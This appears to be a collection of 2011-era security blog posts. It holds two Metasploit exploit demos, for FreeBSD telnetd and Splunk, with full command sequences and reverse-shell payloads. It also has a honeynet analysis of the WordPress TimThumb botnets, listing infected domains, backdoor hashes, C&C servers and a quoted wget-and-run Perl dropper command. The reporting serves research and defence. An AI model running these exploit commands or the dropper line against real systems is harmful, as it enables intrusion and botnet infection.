CVE-2011-4862 FreeBSD Telnet Buffer Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability exploited in the wild
Public release of the vulnerability the 2011-12-23
Metasploit PoC provided the 2011-12-27

PoC provided by :

Jaime Penalba Estebanez
Brandon Perry
Dan Rosenberg
hdm

Reference(s) :

CVE-2011-4862
OSVDB-78020
FreeBSD-SA-11:08.telnetd

Affected version(s) :

All supported versions of FreeBSD.

Tested on FreeBSD 8.1-RELEASE

Description :

This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.

Commands :

use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
SET PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit

id
uname -a

CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo

Event Management, Exploits, Log Management, Metasploit

Timeline :

Vulnerability discovered and reported to the vendor by Gary Oleary-Steele
Coordinated public release of the vulnerability the 2011-12-12
Metasploit PoC provided the 2011-12-22

PoC provided by :

Gary O’Leary-Steele
juan vazquez

Reference(s) :

CVE-2011-4642
OSVDB-77695
SPL-45172

Affected version(s) :

Splunk 4.2 to 4.2.4

Tested on Ubuntu 10.04.3 LTS with :

Splunk 4.2.4

Description :

This module abuses a command execution vulnerability in the web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential of “admin:changeme”, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.

Commands :

use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a

WordPress TimThumb Botnets Spreads Status – first edition

Security visualization, Various,

Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as botnet recruitment vector, and has now spread in multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs visitors, diffusion of spam and phishing campaign, DDoS, hack of other web sites (such as About.us domain name registrar), etc, etc. Some of these infected WordPress were controlled by well known C&C servers used and shared by black hats from around the world.

We are soon six month after the discovery of the vulnerability and a status on the WordPress TimThumb botnets could be done. Are the botnets still active, are less WordPress blogs vulnerable, is the pick of spread over ? We will try, through an analysis of all the WordPress TimThumb vulnerability exploitation attempts against our Honey Net, to answer these questions. The datas collected through our Honey Net are representing only a small part of the real activity of the WordPress TimThumb botnets, but these datas could also represent an extrapolation of the real activities.

List of all detected infected domains

You can find in the following table the complete list of all detected infected domains how were called during the WordPress TimThumb RFI attack, with the domain associated IP address, the country where the blog were hosted, the number of distinct source IPs how have call the related domain during the RFI attack and the live time of the domain name.

We have a total of 202 affected domains. “blogger.com.dollhousedelights.com“, hosted in Vietnam, was the affected domain how was called by the much more distinct source IPs (258), followed by “picasa.com.xpl.be” with 152 distinct source IPs, and at the third place “blogger.com.midislandrental.com” with 110 distinct source IPs.

picasa.com.xpl.be” and “picasa.computergoogle.co.cc” have the longer live time with 105 days, followed by “wordpress.com.hostdail.com” and “blogger.com.pasbar.com” with 72 days.

Infected blogs countries repartition

You can find in the following graphs (Chart1Chart2) the geographically repartition of the infected blogs.

We have a total of 31 different countries for 202 affected domains. United States is in first position with 58.9% (129) of all infected blogs, followed by Australia, Canada and United Kingdom with each 3.7% (8) of all infected blogs.

Infected blogs countries repartition by number of source IPs

You can find in the following graphs (Chart3Chart4) the geographically repartition of the infected blogs by number of distinct source IPs how have call the infected blogs.

We have a total of 1734 distinct source IPs for 202 affected domains and 31 different hosting countries. United States is in first position with 48.5% (841), followed by Vietnam with 14% (243), Indonesia with 4.7% (82) and Taiwan with 4.1% (71).

Timeline by day of infected blogs calls and source IPs

You can find in the following timeline (Chart5) a representation by day of the infected blogs number calls and source IPs.

November 2011 was the most active month for the number of source IPs and that in December the number of source IPs has drastically decrease. You can see that during the first half of November the number of infected blogs calls have increase days after days, and since the 22 November the number of infected blogs is stabilized but is not decreasing.

Geographic timeline by day of all source IPs

In this geographic time map we’re loading datas from a Google Spreadsheet (published here). These datas are coming from our HoneyNet and are representing the geographic Wordpress TimThumb Botnet activities from 15-09-2011 to 03-12-2011.

AfterGlow representation of the WordPress TimThumb

By clicking on the following link, you can download an AfterGlow representation of the WordPress TimThumb botnets with links between each nodes.

Conclusion

WordPress TimThumb botnets are still continuing to infect new blogs, but the associated activities are decreasing since second half December. Maybe black hats are still in holidays 🙂 My personal opinion is that we will steal continu to hear about these botnets during complete 2012.

gangbang.mytijn.org Malware Spreader Down

Various,

By analyzing the payloads and associated C&C used by the WordPress Timthumb botnets, I founded an interesting C&C server named “gangbang.mytijn.org“. And in collaboration with Luxembourg CIRCL, the domain gangbang.mytijn.org is down since the 14 December 2011. This C&C server was known for spreading tonnes of malwares on Internet.

The initial infected WordPress sites were :

  • 222.255.77.90 – AS7643 – Vietnam

This infected server was first seen the 2011-11-05 18:54:22 and last seen the 2011-11-28 05:05:55. 214 distinct source IPs have call malwares hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.comimg.youtube.com.dollhousedelights.com and blog.ssis.edu.vn.

blogger.com.dollhousedelights.com has spread 2 different malwares (PHP backdoor):

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-05 18:55:02
/.mods/index.php - MD5: 51ad7df89f3e7162128b9d642a7ec75b - First seen the 2011-11-05 18:55:05

img.youtube.com.dollhousedelights.com has spread 4 different malwares :

/.mods/sh.php - MD5: b545d6934b776026e6bbfd1f7ef4bb27 - First seen the 2011-11-17 07:37:15
/.mods/sh.php - MD5: acbc38367ffd62c42e1ae20c24890b55 - First seen the 2011-11-23 01:50:04
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-27 23:50:04
/.mods/sh.php - MD5: ec1766b6a365db5099f53c85ad2ed2f1 - First seen the 2011-11-28 02:25:04

All “sh.php” malwares were PHP backdoor, and the “index.php” was a PHP IRC bot.

blog.ssis.edu.vn has spread one malware (PHP backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-17 07:25:05
  • 192.83.167.206 – AS9505 – Taiwan

This infected server was first seen the 2011-11-28 03:30:09 and last seen the 2011-12-08 03:06:44. 71 distinct source IPs have call malwares hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.comimg.youtube.com.dollhousedelights.com and img.youtube.com.midislandrental.com. As you can see blogger.com.dollhousedelights.com and img.youtube.com.dollhousedelights.comwere load balanced (DNS round robin).

blogger.com.dollhousedelights.com has spread 1 malware (PHP Backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-28 03:35:03

img.youtube.com.dollhousedelights.com has spread 3 different malwares:

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-28 05:20:03
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-28 05:35:07
/.mods/sh.php - MD5: e2b94559ff0c3d9219b3a43bf6dcd8bd - First seen the 2011-11-29 07:15:03

All “sh.php” malwares were PHP backdoor, and the “index.php” was a PHP IRC bot.

  • Analyzing the C&C servers

The PHP IRC bot was interesting, cause he invoke the potential first C&C server. You can find the encoded and decoded versions of the PHP IRC bot on pastbin. This script also permit to execute commands on the affected server and execute UDP or TCP flood attacks.

You can see that the first C&C server is gangbang.mytijn.org on port 23232/TCP and the #wWw# channel is protected by password. Also it is required to display a particular nick name, ident and real name in order to be identified on the IRC server.

Also by digging gangbang.mytijn.org domain name at different time, we can see that the domain was load balanced by using DNS round robin method. Each IP addresses present in the round robin load balancing had also the port 23232/TCP open.

By playing with Cuckoo Sandbox, the first C&C owners have execute some commands on the sandbox, and permit me to analyse the java.txt file.

cd /tmp && rm -rf java.txt && wget http://72.41.115.123/.mods/java.txt && chmod 755 java.txt && perl java.txt && … && rm -rf java.txt

You can also find the java.txt script on pastebin. This script connects to second C&C server, making the first C&C only a proxy. But this script also permit to execute different attacks like RFI, LFI, SQL injection and targeting specific web applications like e107, osCommerce and WordPress.

The second C&C server is known as irc.javairc.org on port 6667/TCP. Most of the affected machines were located on this IRC server.

Some funny conversations were made by the C&C owners and all this conversations were done in Indonesian.